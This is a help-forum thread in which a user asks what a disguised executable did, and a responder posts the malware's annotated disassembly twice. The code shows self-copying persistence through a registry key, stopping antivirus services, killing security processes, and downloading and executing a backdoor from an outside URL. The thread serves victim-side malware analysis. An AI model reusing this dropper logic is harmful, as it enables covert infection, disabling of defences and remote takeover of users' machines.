joyrider
asked on
What does this asm code do ??????
Hi,
i got the unfortunate accident of running an exe (it was spoofed as another file) and i don't know what it did,
i can't see anything (atm) changed on my pc or broken. but i still like to know what it did !!!!!
if disassembled the file using some tool and gotten some asm code but i don't understand it so please tell me what it does !
the asm code and program (in case u need it) are both here :
http://users.pandora.be/IMS/help/
The program is called dontrun.ttt i renamed it for safety measures just don't run it cause i don't know what it does
the asm code i gotten is in dontrun.asm
please tell me what it does cause i'm a bit worried thanks !!!!!!
i got the unfortunate accident of running an exe (it was spoofed as another file) and i don't know what it did,
i can't see anything (atm) changed on my pc or broken. but i still like to know what it did !!!!!
if disassembled the file using some tool and gotten some asm code but i don't understand it so please tell me what it does !
the asm code and program (in case u need it) are both here :
http://users.pandora.be/IMS/help/
The program is called dontrun.ttt i renamed it for safety measures just don't run it cause i don't know what it does
the asm code i gotten is in dontrun.asm
please tell me what it does cause i'm a bit worried thanks !!!!!!
Here is the code, the application list has been omitted, it's too long to put here.
start:
push 100h ; sizeof szWindowsDir
push offset szWindowsDir
call GetWindowsDirectory
push offset szSlash ; "\\"
push offset szWindowsDir
call lstrcat
push offset szWindows33_exe ; "windows33.exe"
push offset szWindowsDir
call lstrcat
push offset lpFindFileData
push offset szWindowsDir
call FindFirstFile
cmp eax, 0FFFFFFFFh
jz short NotFound
jmp short FoundIt
NotFound:
push 100h
push offset szVictimExeFile
push 0
call GetModuleFileName
push 0
push offset szWindowsDir
push offset szVictimExeFile
call CopyFile
push offset sizeofWin33Data
push 20006h
push 0
push offset aSoftwareMicros ; SOFTWARE\Microsoft\Windows
push 80000002h
call RegOpenKeyEx
push eax ; hKey
push offset szWindowsDir
push 1
push 0
push offset Win33Data ; "windows33"
push ds:sizeofWin33Data
call RegSetValueEx
push ds:sizeofWin33Data
call RegCloseKey
FoundIt:
push offset szKernel32_dll ; "kernel32.dll"
call GetModuleHandle
push offset aRegisterservic ; "RegisterServiceProcess"
push eax
call GetProcAddress
test eax, eax
jz short CannotFindApi
push 1
push 0
call eax ; call RegisterServiceProcess
jmp short CallApiSuccessful ; hide myself. only available under Win9x
CannotFindApi:
push 0
push offset aNetStopNavapsv ; "NET STOP NAVAPSVC"
call WinExec
push 0
push offset aNetStopPersfw ; "NET STOP PERSFW"
call WinExec
push 0
push offset aNetStopAvpcc ; "NET STOP AVPCC"
call WinExec
CallApiSuccessful:
lea esi, pAppList
loopit:
lodsb
test al, al ; if terminate?
jnz short loopit
mov al, [esi]
test al, al
jz short gotfilenameend
push esi ; esi->app name
call killprocess
jmp short loopit
gotfilenameend:
push 100h
push offset szWindowsDir
call GetWindowsDirectory
push offset szSlash ; "\\"
push offset szWindowsDir
call lstrcat
push offset aXtb_exe ; "xtb.exe"
push offset szWindowsDir
call lstrcat
push offset lpFindFileData
push offset szWindowsDir
call FindFirstFile
cmp eax, 0FFFFFFFFh
jz short HasntFoundIt
jmp short HasFoundIt
HasntFoundIt:
call DownloadIt ; if we haven't found it, download it from
; http://www.phoenix.secure-tech.net/web/xxx.exe
HasFoundIt:
push 1388h
call Sleep
push offset aKernel32_dll ; "kernel32.dll"
call GetModuleHandle
push offset aRegisterservic ; "RegisterServiceProcess"
push eax
call GetProcAddress
test eax, eax
jz CannotFindApi
jmp CallApiSuccessful
push eax
call ExitProcess
killprocess proc szTargetExeName:LPSTR
LOCAL szTmpExeFile[256]:BYTE
LOCAL procsentry:PROCESSENTRY32
push ebp
mov ebp, esp
add esp, 0FFFFFDD4h
mov procsentry.dwSize, sizeof PROCESSENTRY32 ;128h
push 0 ; means current process
push 2
call CreateToolhelp32Snapshot
mov hSnapshot, eax
mov edi, szTargetExeName
lea eax, procsentry
push eax
push hSnapshot
call Process32First
continue:
lea eax, szTmpExeFile
push eax
lea eax, procsentry.szExeFile
push eax
call splitfilename ; get the file name separate from the path
lea eax, szTmpExeFile
push eax
push edi
call lstrcmpi ; compare the exe name with szTargetExeName
test eax, eax
jnz short notequal
push procsentry.th32ProcessID
push 0
push 1
call OpenProcess ; get target process handle
push 0
push eax
call TerminateProcess ; terminate it.
push 64h
call Sleep
notequal:
lea eax, procsentry
push eax
push hSnapshot
call Process32Next ; find next
test eax, eax
jz short finished
jmp short continue
finished:
push hSnapshot
call CloseHandle
leave
retn 4
killprocess endp
splitfilename proc szPathName:LPSTR, szName:LPSTR
push ebp
mov ebp, esp
push esi
push edi
push ebx
push eax
mov esi, szPathName
mov ebx, esi
searchagain:
lodsb
cmp al, 0 ; if terminate?
jz short finished
cmp al, '\'
jnz short searchagain ; find the '\'
mov ebx, esi ; save the position of next char
jmp short searchagain ; actually, need to find last '\'
finished:
mov edi, szName
mov esi, ebx
loooop:
lodsb ; copy the name except the path
stosb
cmp al, 0
jnz short loooop
pop eax
pop ebx
pop edi
pop esi
leave
retn 8
splitfilename endp
DownloadIt proc near
repeatit:
push offset lpWSAData
push 101h
call WSAStartup
cmp eax, 0
jnz short repeatit ; if not success
doitagain:
push offset szUrlMicrosoft ; "www.microsoft.com"
call gethostbyname
cmp eax, 0
jz short getnameerror ; false
jnz short getnameok
getnameerror:
push 1388h
call Sleep
jmp short doitagain
getnameok:
push 0
push 0
push offset szWindowsDir
push offset aHttpWww_phoeni ; "http://www.phoenix.secure-tech.net/web/xxx.exe"
push 0
call URLDownloadToFile
push 0
push offset szWindowsDir
call WinExec ; download it, then execute it.
xor eax, eax
call WSACleanup
retn
DownloadIt endp
aXtb_exe db 'xtb.exe'
db 20 dup(0)
aHttpWww_phoeni db 'http://www.phoenix.secure-tech.net/web/xxx.exe',0
dd 4 dup(0)
align 4
szUrlMicrosoft db 'www.microsoft.com',0
aKernel32_dll db 'kernel32.dll',0
aRegisterservic db 'RegisterServiceProcess',0
pAppList db 0 ;
a_avpcc_exe db '_AVPCC.EXE',0
; ... here a long list of application's name omitted ...
aZonealarm_exe db 'ZONEALARM.EXE'
db 3 dup(0)
aNetStopNavapsv db 'NET STOP NAVAPSVC',0
aNetStopAvpcc db 'NET STOP AVPCC',0
aNetStopPersfw db 'NET STOP PERSFW',0
szSlash db '\',0
aSoftwareMicros db 'SOFTWARE\Microsoft\Window
Win33Data db 'windows33',0
dd 4 dup(0)
db 2 dup(0)
szWindows33_exe db 'windows33.exe',0
dd 4 dup(?)
sizeofWin33Data dd ?
hSnapshot dd ?
dd ?
lpFindFileData dd 4Fh dup(?)
db 2 dup(?)
szWindowsDir dd 40h dup(?)
szVictimExeFile dd 40h dup(?)
lpWSAData dd 354h dup(?)
db 2 dup(?)
start:
push 100h ; sizeof szWindowsDir
push offset szWindowsDir
call GetWindowsDirectory
push offset szSlash ; "\\"
push offset szWindowsDir
call lstrcat
push offset szWindows33_exe ; "windows33.exe"
push offset szWindowsDir
call lstrcat
push offset lpFindFileData
push offset szWindowsDir
call FindFirstFile
cmp eax, 0FFFFFFFFh
jz short NotFound
jmp short FoundIt
NotFound:
push 100h
push offset szVictimExeFile
push 0
call GetModuleFileName
push 0
push offset szWindowsDir
push offset szVictimExeFile
call CopyFile
push offset sizeofWin33Data
push 20006h
push 0
push offset aSoftwareMicros ; SOFTWARE\Microsoft\Windows
push 80000002h
call RegOpenKeyEx
push eax ; hKey
push offset szWindowsDir
push 1
push 0
push offset Win33Data ; "windows33"
push ds:sizeofWin33Data
call RegSetValueEx
push ds:sizeofWin33Data
call RegCloseKey
FoundIt:
push offset szKernel32_dll ; "kernel32.dll"
call GetModuleHandle
push offset aRegisterservic ; "RegisterServiceProcess"
push eax
call GetProcAddress
test eax, eax
jz short CannotFindApi
push 1
push 0
call eax ; call RegisterServiceProcess
jmp short CallApiSuccessful ; hide myself. only available under Win9x
CannotFindApi:
push 0
push offset aNetStopNavapsv ; "NET STOP NAVAPSVC"
call WinExec
push 0
push offset aNetStopPersfw ; "NET STOP PERSFW"
call WinExec
push 0
push offset aNetStopAvpcc ; "NET STOP AVPCC"
call WinExec
CallApiSuccessful:
lea esi, pAppList
loopit:
lodsb
test al, al ; if terminate?
jnz short loopit
mov al, [esi]
test al, al
jz short gotfilenameend
push esi ; esi->app name
call killprocess
jmp short loopit
gotfilenameend:
push 100h
push offset szWindowsDir
call GetWindowsDirectory
push offset szSlash ; "\\"
push offset szWindowsDir
call lstrcat
push offset aXtb_exe ; "xtb.exe"
push offset szWindowsDir
call lstrcat
push offset lpFindFileData
push offset szWindowsDir
call FindFirstFile
cmp eax, 0FFFFFFFFh
jz short HasntFoundIt
jmp short HasFoundIt
HasntFoundIt:
call DownloadIt ; if we haven't found it, download it from
; http://www.phoenix.secure-tech.net/web/xxx.exe
HasFoundIt:
push 1388h
call Sleep
push offset aKernel32_dll ; "kernel32.dll"
call GetModuleHandle
push offset aRegisterservic ; "RegisterServiceProcess"
push eax
call GetProcAddress
test eax, eax
jz CannotFindApi
jmp CallApiSuccessful
push eax
call ExitProcess
killprocess proc szTargetExeName:LPSTR
LOCAL szTmpExeFile[256]:BYTE
LOCAL procsentry:PROCESSENTRY32
push ebp
mov ebp, esp
add esp, 0FFFFFDD4h
mov procsentry.dwSize, sizeof PROCESSENTRY32 ;128h
push 0 ; means current process
push 2
call CreateToolhelp32Snapshot
mov hSnapshot, eax
mov edi, szTargetExeName
lea eax, procsentry
push eax
push hSnapshot
call Process32First
continue:
lea eax, szTmpExeFile
push eax
lea eax, procsentry.szExeFile
push eax
call splitfilename ; get the file name separate from the path
lea eax, szTmpExeFile
push eax
push edi
call lstrcmpi ; compare the exe name with szTargetExeName
test eax, eax
jnz short notequal
push procsentry.th32ProcessID
push 0
push 1
call OpenProcess ; get target process handle
push 0
push eax
call TerminateProcess ; terminate it.
push 64h
call Sleep
notequal:
lea eax, procsentry
push eax
push hSnapshot
call Process32Next ; find next
test eax, eax
jz short finished
jmp short continue
finished:
push hSnapshot
call CloseHandle
leave
retn 4
killprocess endp
splitfilename proc szPathName:LPSTR, szName:LPSTR
push ebp
mov ebp, esp
push esi
push edi
push ebx
push eax
mov esi, szPathName
mov ebx, esi
searchagain:
lodsb
cmp al, 0 ; if terminate?
jz short finished
cmp al, '\'
jnz short searchagain ; find the '\'
mov ebx, esi ; save the position of next char
jmp short searchagain ; actually, need to find last '\'
finished:
mov edi, szName
mov esi, ebx
loooop:
lodsb ; copy the name except the path
stosb
cmp al, 0
jnz short loooop
pop eax
pop ebx
pop edi
pop esi
leave
retn 8
splitfilename endp
DownloadIt proc near
repeatit:
push offset lpWSAData
push 101h
call WSAStartup
cmp eax, 0
jnz short repeatit ; if not success
doitagain:
push offset szUrlMicrosoft ; "www.microsoft.com"
call gethostbyname
cmp eax, 0
jz short getnameerror ; false
jnz short getnameok
getnameerror:
push 1388h
call Sleep
jmp short doitagain
getnameok:
push 0
push 0
push offset szWindowsDir
push offset aHttpWww_phoeni ; "http://www.phoenix.secure-tech.net/web/xxx.exe"
push 0
call URLDownloadToFile
push 0
push offset szWindowsDir
call WinExec ; download it, then execute it.
xor eax, eax
call WSACleanup
retn
DownloadIt endp
aXtb_exe db 'xtb.exe'
db 20 dup(0)
aHttpWww_phoeni db 'http://www.phoenix.secure-tech.net/web/xxx.exe',0
dd 4 dup(0)
align 4
szUrlMicrosoft db 'www.microsoft.com',0
aKernel32_dll db 'kernel32.dll',0
aRegisterservic db 'RegisterServiceProcess',0
pAppList db 0 ;
a_avpcc_exe db '_AVPCC.EXE',0
; ... here a long list of application's name omitted ...
aZonealarm_exe db 'ZONEALARM.EXE'
db 3 dup(0)
aNetStopNavapsv db 'NET STOP NAVAPSVC',0
aNetStopAvpcc db 'NET STOP AVPCC',0
aNetStopPersfw db 'NET STOP PERSFW',0
szSlash db '\',0
aSoftwareMicros db 'SOFTWARE\Microsoft\Window
Win33Data db 'windows33',0
dd 4 dup(0)
db 2 dup(0)
szWindows33_exe db 'windows33.exe',0
dd 4 dup(?)
sizeofWin33Data dd ?
hSnapshot dd ?
dd ?
lpFindFileData dd 4Fh dup(?)
db 2 dup(?)
szWindowsDir dd 40h dup(?)
szVictimExeFile dd 40h dup(?)
lpWSAData dd 354h dup(?)
db 2 dup(?)
In addition, I just downloaded the 'http://www.phoenix.secure-tech.net/web/xxx.exe', it is compacted with UPX.
ASKER
Hi i uploaded windows33.exe as well it's seems it's just a copy of the original dontrun.exe file. I also immediatly found out it entered a regentry to the reg so i removed that. After downloading XTB.exe my nav found it as a irc.backdoor.trojan
Now i also used it on an older pc where i had a filemonitor and regmonitor running. What was weird is that the windows33.exe file kept looking in the reg to printer settings and also scanned throught the whole mm256.dat in the inter history folder so i guess it collects the sites u've been to get any passwords.
Now the big question since i removed all the startup functions in the reg for this windows33.exe and removed both windows33.exe and xtb.exe can i assume it's safe now ? tried both a complete system scan and a Trojan scan
Ure getting the points since u helped me but just like to know if i need to format or not
Now i also used it on an older pc where i had a filemonitor and regmonitor running. What was weird is that the windows33.exe file kept looking in the reg to printer settings and also scanned throught the whole mm256.dat in the inter history folder so i guess it collects the sites u've been to get any passwords.
Now the big question since i removed all the startup functions in the reg for this windows33.exe and removed both windows33.exe and xtb.exe can i assume it's safe now ? tried both a complete system scan and a Trojan scan
Ure getting the points since u helped me but just like to know if i need to format or not
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER
thanks for the help !ç
It's a Trojan virus. please search "windows33.exe" and "xtb.exe" in your PC. the xtb.exe is downloaded from this URL "http://www.phoenix.secure-tech.net/web/xxx.exe"
I will post the asm code in the next comment.